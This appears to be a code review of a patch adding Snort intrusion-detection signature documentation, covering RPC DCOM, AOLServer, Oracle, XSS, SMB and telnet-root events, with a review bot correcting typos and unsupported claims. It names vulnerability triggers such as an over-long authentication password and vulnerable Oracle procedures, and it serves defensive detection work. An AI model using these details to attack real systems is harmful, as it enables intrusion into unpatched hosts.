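Review bot: Detailed Information: "Webtrends Ecurity Scanner" should be "Webtrends Security Scanner" and "a ICMP Echo Request" should be "an ICMP Echo Request". This file has no "Affected Systems" section while every other file in the patch has one; add it so the format stays uniform. Ease of Attack says the "ping" utility can generate these messages, but the rule matches the specific payload "|00000000454545454545454545454545|", and the False Negatives section itself notes that a user-defined payload needs a packet generation tool; rewording to say the scanner is freely available would be more accurate. Corrective Action's blanket block on inbound ICMP Type 8 Code 0 also breaks legitimate reachability checks; worth saying that rate limiting is an alternative.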
--- /dev/null
+++ b/doc/signatures/3167.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3167
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
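Review bot: this is the third identical copy of the RPC DCOM text in this patch (also doc/signatures/3226.txt and doc/signatures/3322.txt), again with "Expoit" in Ease of Attack and no references. Fix the typo in all three and state what SID 3167 detects that the other two do not, since identical documentation gives an analyst no way to triage the three events differently.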
--- /dev/null
+++ b/doc/signatures/536.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+536
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
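Review bot: Attack Scenarios: "adminsitrative shares" should be "administrative shares". Summary and Detailed Information say the attempt is made "using Samba", but Affected Systems also lists Windows file and print sharing, so the rule presumably matches SMB traffic regardless of the client; say which SMB operation the rule keys on rather than "using Samba", to avoid implying only Samba clients are detected. Corrective Action could add that access to private and administrative shares from outside the protected network should be filtered, as the other SMB files in this patch recommend.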
--- /dev/null
+++ b/doc/signatures/100000123.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+100000123
+
+--
+Summary:
+This event is generated when inappropriate content is detected in network 
+traffic.
+
+--
+Impact:
+Possible policy violation.
+
+--
+Detailed Information:
+This event is generated when inappropriate content is detected in network 
+traffic. Specifically, the content "pre-teen" was observed.
+
+--
+Affected Systems:
+ All systems.
+
+--
+Attack Scenarios:
+This event indicates that inappropriate content may have been accessed from a 
+host on the protected network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+This may be a policy violation, refer to the appropriate internal policy.
+
+--
+Contributors:
+Original Rule writer rmkml <rmkml@free.fr>
+Sourcefire Vulnerability Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
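Review bot: False Positives "None known." is not credible for a bare content match on "pre-teen": the string occurs in ordinary parenting, education and retail content, so the section should state that legitimate traffic will match and that the event is only an indicator for policy review. "Ease of Attack: Simple." and the Attack Scenarios wording do not fit a policy rule in which no attack occurs; say so. Affected Systems has a stray leading space before "All systems."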
--- /dev/null
+++ b/doc/signatures/1260.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1260
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in AOLServer.
+
+--
+Impact:
+Possible Denial of Service (DoS) and execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in versions of AOL Server that may allow an
+attacker to overflow a fixed length buffer and execute code of their
+choosing on a vulnerable host.
+
+The problem lies in the processing of user supplied passwords used in
+basic authentication to the host. A long password may exceed a fixed
+length buffer and allow an attacker to overwrite portions of memory and
+execute code of their choosing.
+
+--
+Affected Systems:
+	AOL AOLServer 3.0 and 3.2
+
+--
+Attack Scenarios:
+An attacker needs to supply a password 2048 bytes in length to trigger
+the overflow.
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-vulnerable version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
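Review bot: "AOLServer" in Summary and Affected Systems versus "AOL Server" in Detailed Information; pick one spelling. Attack Scenarios says a password "2048 bytes in length" triggers the overflow while Detailed Information says a long password "may exceed a fixed length buffer"; state whether 2048 is the buffer size (so anything longer overflows) or the exact length the rule checks, since that determines what the rule will and will not catch. Additional References is empty although Ease of Attack says exploits are available; add the advisory. The "-- " separator before Additional References has trailing whitespace.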
--- /dev/null
+++ b/doc/signatures/2239.txt
@@ -0,0 +1,62 @@
+Rule:  
+
+--
+Sid:
+2239
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in PDGSoft Shopping Cart.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+Certain versions of PDGSoft Shopping Cart suffer from a buffer overflow 
+condition that can present an attacker with the opportunity to execute 
+arbitrary code of their choosing.
+
+The vulnerable executable files are redirect.exe and changepw.exe, which
+can be accessed via the web interface.
+
+--
+Affected Systems:
+	PDGSoft Shopping Cart 1.50
+
+--
+Attack Scenarios:
+The attacker needs to supply an overly long string to either of the 
+affected executables.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1256
+
+--
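Review bot: "Rule:  " on the first line and the "-- " before Additional References carry trailing whitespace; strip them. Ease of Attack says "No exploit software required" while Impact lists only "Execution of arbitrary code"; if an over-long string sent to redirect.exe or changepw.exe without crafted input merely crashes the program, the DoS outcome should be listed under Impact too, so that the two sections agree on what a hit can mean.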
--- /dev/null
+++ b/doc/signatures/719.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+719
+
+--
+Summary:
+This event is generated after an attempted login to a telnet server 
+using the username root.
+
+--
+Impact:
+Remote root access.  This may or may not indicate a successful root 
+login to a telnet server.
+
+--
+Detailed Information:
+This event is generated after a telnet server observes an attempted 
+login with the username root.  It is not possible to tell from this 
+event alone whether or not the attempt was successful.  If this is 
+followed by a login failure event, the root login did not succeeed.  
+However, if no failure message is observed and the rule with SID 718 is 
+enabled, this may indicate that the root login succeeded.
+
+--
+Affected Systems:
+Telnet servers.
+
+--
+Attack Scenarios:
+An attacker may attempt to connect to a telnet server using the username
+of root.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Consider using Secure Shell instead of telnet.
+
+Disable root logins to telnet.
+
+
+Block inbound telnet access if it is not required.
+
+--
+Contributors:
+Original rule writer unknown.
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
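Review bot: Detailed Information: "succeeed" should be "succeeded". Contributors: "Steven Alexander<alexander.s@mccd.edu>" is missing the space before the address. Corrective Action has a doubled blank line between "Disable root logins to telnet." and "Block inbound telnet access". The cross-reference to SID 718 is the useful part of this file; say what SID 718 fires on (presumably the login failure message the text refers to) so a reader can follow the "if no failure message is observed" reasoning.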
--- /dev/null
+++ b/doc/signatures/697.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+697
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
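Review bot: the Affected Systems section is empty, and neither the Summary ('a known vulnerability in Microsoft SQL') nor the Detailed Information identifies which vulnerability or which request the rule matches, while Ease of Attack asserts 'Exploits exist' with nothing under Additional References to back it. Either name the product versions and cite the advisory, or reword the text as a generic probe signature so that the claims match what the rule can actually see on the wire.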
--- /dev/null
+++ b/doc/signatures/2251.txt
@@ -0,0 +1,80 @@
+Rule:  
+
+--
+Sid:
+2251
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerablity in Microsoft RPCSS service for RPC.
+
+--
+Impact:
+Denial of Service. Possible execution of arbitrary code leading to
+unauthorized remote administrative access.
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPCSS Service that handles RPC DCOM
+requests such that execution of arbitrary code or a Denial of Service 
+condition can be issued against a host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to the host
+running the RPCSS service may result in a buffer overflow condition that
+will present the attacker with the opportunity to execute arbitrary code
+with the privileges of the local system account. Alternatively the
+attacker could also cause the RPC service to stop answering RPC requests
+and thus cause a Denial of Service condition to occur.
+
+--
+Affected Systems:
+	Windows NT 4.0 Workstation and Server
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a DCERPC bind request followed by a malicious
+DCERPC DCOM remote activation request.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139, 445 and 593 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Disallow the use of RPC over HTTP and HTTPS.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS03-039.asp
+
+eEye:
+http://www.eeye.com/html/Research/Advisories/AD20030910.html
+
+--
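Review bot: two spelling errors in this hunk, 'vulnerablity' in the Summary and 'Expoit' under Ease of Attack. The Corrective Action lists port 593 among the ports to block 'for both TCP and UDP'; 593 is the RPC over HTTP endpoint mapper and is then addressed again by 'Disallow the use of RPC over HTTP and HTTPS', so either fold the two statements together or say that 593 is listed because of RPC over HTTP. The Affected Systems list should be checked against the MS03-039 bulletin that is cited, since that bulletin is the authority for which platforms and service packs are exposed.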
--- /dev/null
+++ b/doc/signatures/395.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+
+Sid:
+395
+
+--
+
+Summary:
+This event is generated when an ICMP Destination Network Unknown datagram is detected on the network.  Gateway devices normally generate these ICMP messages when the destination network is unreachable.
+
+--
+
+Impact:
+This ICMP message will be generated when the destination network specified in the datagram is unreachable.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Large numbers of these messages on the network could indication routing problems or faulty routing
+devices.
+
+--
+
+Attack Scenarios:
+None Known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no correct action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
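Review bot: the Summary and Impact equate 'Destination Network Unknown' with 'the destination network is unreachable', but these are different ICMP type 3 codes (code 0 is Network Unreachable, code 6 is Destination Network Unknown); reword so the text describes code 6 specifically. Grammar: 'could indication routing problems' in Detailed Information should read 'could indicate routing problems', and 'no correct action is necessary' in Corrective Action should be 'no corrective action is necessary'. The Impact section merely restates the Summary; say instead that a single message has no security impact and that only the volume or the source is of interest. This file also lacks the Affected Systems section that every other file in the patch carries.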
--- /dev/null
+++ b/doc/signatures/2044.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2044
+
+--
+Summary:
+The Point to Point Tunneling Protocol (PPTP) is used to connect client 
+machines to internal corporate resources using a Virtual Private Network
+(VPN) across a public network such as the Internet via an encrypted 
+session.
+
+
+--
+Impact:
+Possible loss of data from an internal network to an unknown external 
+source.
+
+--
+Detailed Information:
+This event indicates that a PPTP session from an internal resource to an
+unknown external source has been attempted. This may be an indication of
+an attempt to initialize an encrypted session for nefarious purposes.
+
+An internal user may try to use an encrypted tunnel to evade possible 
+detection when transferring files from an internal resource to an 
+unauthorized eternal party.
+
+--
+Affected Systems:
+All systems allowing PPTP connections from an internal to external 
+source.
+
+--
+Attack Scenarios:
+The user only needs to initiate a connection to an external source.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow PPTP transactions from the internal LAN to external sources.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
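Review bot: the Summary describes what PPTP is rather than what the event is; its first sentence should say that the event fires on a PPTP session attempted from an internal host to an external address, as the Detailed Information does, with the protocol description moved below it. 'unauthorized eternal party' in Detailed Information should be 'external'. The Corrective Action 'Disallow PPTP transactions from the internal LAN to external sources' and the False Positives entry 'None Known' sit uneasily with the Summary's own statement that PPTP is how client machines reach corporate resources: an internal user connecting to an authorized remote VPN concentrator will trigger this rule, so list that as a false positive and qualify the corrective action to unapproved destinations.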
--- /dev/null
+++ b/doc/signatures/632.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid:
+632
+
+--
+Summary:
+This event is generated when an external user scans an internal SMTP server using Network Associates' Cybercop vulnerability scanner. 
+
+--
+Impact:
+Information gathering. 
+
+--
+Detailed Information:
+Cybercop Scanner is scanning software that searches for system vulnerabilities. As one of its scanning procedures, it sends an expn command to SMTP server ports to determine if the SMTP server will return a list of email addresses, aliases, and distribution lists.  
+
+--
+Affected Systems:
+Any SMTP server that returns a list of email addresses, aliases, and distribution lists when queried with the expn command.
+
+--
+Attack Scenarios:
+An attacker may run Cybercop Scanner against SMTP servers in order to determine vulnerabilities that can later be exploited.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable expn on your mail server.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+
+--
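Review bot: the Detailed Information should state what distinguishes the Cybercop probe from any other EXPN command (the argument or string the rule matches on), because without it an analyst cannot tell whether the alert really identifies 'Network Associates' Cybercop vulnerability scanner' or any client issuing EXPN, and the False Positives claim 'None known' cannot be evaluated. Corrective Action 'Disable expn on your mail server' is right as far as it goes; VRFY leaks the same address information and is normally disabled together with EXPN, so mention it.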
--- /dev/null
+++ b/doc/signatures/2315.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2315
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft Windows Workstation service.
+
+--
+Impact:
+Serious. Denial of Service (DoS), execution of arbitrary code is
+possible.
+
+--
+Detailed Information:
+Due to insufficient bounds checking in the Microsoft Windows Workstation
+service, it may be possible for an attacker to overwrite portions of
+memory. This can result in the attacker being presented with the
+opportunity to execute code of their choosing. Under some circumstances
+a Denial of Service condition may be possible against the target host.
+
+Specifically, the DCE/RPC service allows for overly long strings to be
+sent to the Workstation logging function. This logging function does not
+check parameters sufficiently which results in the buffer overflow
+condition.
+
+--
+Affected Systems:
+	Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
+	Microsoft Windows XP, Microsoft Windows XP Service Pack 1
+	Microsoft Windows XP 64-Bit Edition
+
+--
+Attack Scenarios:
+The attacker may use one of the available exploits to target a
+vulnerable host.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-28.html
+http://www.kb.cert.org/vuls/id/567620
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-049.asp
+
+--
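Review bot: the Corrective Action gives only 'Apply the appropriate vendor supplied patches and service packs', whereas the other Microsoft RPC entries in this patch (sids 2251 and 3157) also advise blocking the RPC ports 135, 139 and 445 from external sources; since the Detailed Information says the overflow is reached through the DCE/RPC service, the same port-blocking mitigation applies here and should be listed. Minor: 'None known' under False Negatives lacks the terminating period used everywhere else in the file, and the Affected Systems list would be easier to check against MS03-049 if it also said which service pack fixes the issue.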
--- /dev/null
+++ b/doc/signatures/2900.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2900
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure purge_statistics
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
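Review bot: the Detailed Information has the procedure name split from its sentence by a line break, 'vulnerability in the procedure purge_statistics' / '. This procedure is included in' / 'sys.dbms_repcat_conf.', which looks like an unfilled template rendered onto separate lines; join it into one sentence ('... in the procedure purge_statistics in the package sys.dbms_repcat_conf.'). 'Oracle Oracle9i' under Affected Systems repeats the vendor name and gives no release or patch level, Corrective Action 'Apply the appropriate vendor supplied patch' has no terminating period, and Additional References is empty for a rule that claims 'a known vulnerability'; add the Oracle alert that covers dbms_repcat_conf.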
--- /dev/null
+++ b/doc/signatures/1497.txt
@@ -0,0 +1,82 @@
+Rule:
+--
+Sid:
+1497
+--
+Summary:
+This event is generated when a cross-site scripting attack is being 
+attempted, or a potential attacker is testing your site to determine if 
+it is vulnerable.
+
+--
+Impact:
+Successful cross-site scripting attacks generally target the users of 
+your web site. Attackers can potentially gain access to your users' 
+cookies or session ids, allowing the attacker to impersonate your
+user. They could also set up elaborate fake logon screens to steal 
+user names and passwords.
+
+--
+Detailed Information:
+Whenever a web application accepts input (either via the URL or the 
+POST method) and then uses that input as part of the HTML of a new page 
+without filtering, the application is vulnerable to cross-site 
+scripting.  The traditional means of exploiting this is to embed a 
+"<SCRIPT>" tag into the input. The code following the tag is then 
+executed by the victim's browser.
+
+--
+Affected Systems:
+Many older versions of web server software are affected, as are numerous
+web applications.
+
+--
+Attack Scenarios:
+The most common avenue of attack is for the attacker to send an HTML 
+formatted email to the victim. The email will contain a link to a 
+specially crafted URL which contains the exploit. When the victim clicks
+on the link, they are directed to the vulnerable web site and the attack
+code is executed by their browser.
+--
+Ease of Attack:
+Moderately Easy.  Exploit code exists to automate attacks against users 
+of some widely deployed web applications which are known to be 
+vulnerable. 
+
+Finding vulnerabilities in other, including proprietary, web
+applications is fairly trivial and existing exploit code could easily be
+modified to take advantage of newly discovered vulnerabilities.
+
+--
+False Positives:
+Web pages that legimately include the <SCRIPT> tag could generate this 
+event under certain circumstances.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Determine if your web application is actually vulnerable to this 
+attack. If it is and the application is not of your own design, contact 
+the authors or vendor and see if there is a patch or newer version. If 
+the application is proprietary to you or your company, ensure that it 
+properly validates input.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+iDefense
+http://www.idefense.com/idpapers/XSS.pdf
+
+CERT
+http://www.cert.org/advisories/CA-2000-02.html
+
+--
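Review bot: the False Positives entry, 'Web pages that legimately include the <SCRIPT> tag', describes server responses while the Detailed Information describes attacker input arriving in a request ('either via the URL or the POST method'), so the doc should say which direction the rule inspects. If it matches client requests, the false-positive case is really forms or URLs that legitimately carry HTML (content-management editors, for instance); if it matches responses, the entry is right but the Summary needs the same qualification. Spelling: 'legimately' should be 'legitimately'. Formatting: the '--' after Attack Scenarios lacks the blank line that precedes every other separator in the file, and the Rule/Sid block at the top omits the blank lines the other files use.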
--- /dev/null
+++ b/doc/signatures/2838.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2838
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure resume_master_activity
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
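Review bot: same template defect as the purge_statistics entry (sid 2900): the procedure name is broken across lines, 'vulnerability in the procedure resume_master_activity' / '. This procedure is included in' / 'sys.dbms_repcat_mas.', and should be one sentence; 'Oracle Oracle9i' duplicates the vendor name and gives no release; 'Apply the appropriate vendor supplied patch' lacks a period; and Additional References is empty. Since this text is identical to the sid 2900 entry apart from the procedure and package names, fix both from one corrected template rather than by hand.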
--- /dev/null
+++ b/doc/signatures/912.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+912
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
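Review bot: the Summary claims the event fires on 'a known vulnerability in a ColdFusion web server', but the Detailed Information says 'Many known vulnerabilities exist for this platform and the attack scenarios are legion' and names none, and Additional References is empty. The doc should say which ColdFusion request or path the rule matches so an analyst can judge the alert, and cite the corresponding advisory. The product name alternates between 'ColdFusion' and 'Coldfusion'; use one spelling.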
--- /dev/null
+++ b/doc/signatures/841.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+841
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
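Review bot: 'running ona web server' in the Detailed Information should read 'on a web server', and the line 'relationships between the victim server and other hosts can be exploited by the attacker.' runs well past the wrap width used for the rest of the file. More substantively, the text never says which CGI script the rule is for: 'a CGI web application', 'All systems running CGI applications' and an empty Additional References leave a generic description that could attach to any CGI rule; name the script and the input it mishandles.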
--- /dev/null
+++ b/doc/signatures/100000173.txt
@@ -0,0 +1,59 @@
+Rule: 
+
+--
+Sid: 
+100000173
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known 
+vulnerability in RSA Security RSA Authentication Agent For Web.
+
+-- 
+Impact: 
+Cross site scripting leading to possible inclusion of code of the attackers 
+choosing.
+
+--
+Detailed Information:
+A vulnerability exists in RSA Security RSA Authentication Agent For Web that 
+may allow an attacker to include code of their choosing due to the improper 
+checking of user supplied input.
+
+--
+Affected Systems:
+RSA Security RSA Authentication Agent For Web 5.2
+
+--
+Attack Scenarios: 
+An attacker can supply a link to include code of their choosing in data 
+supplied to RSA Security RSA Authentication Agent For Web.
+
+-- 
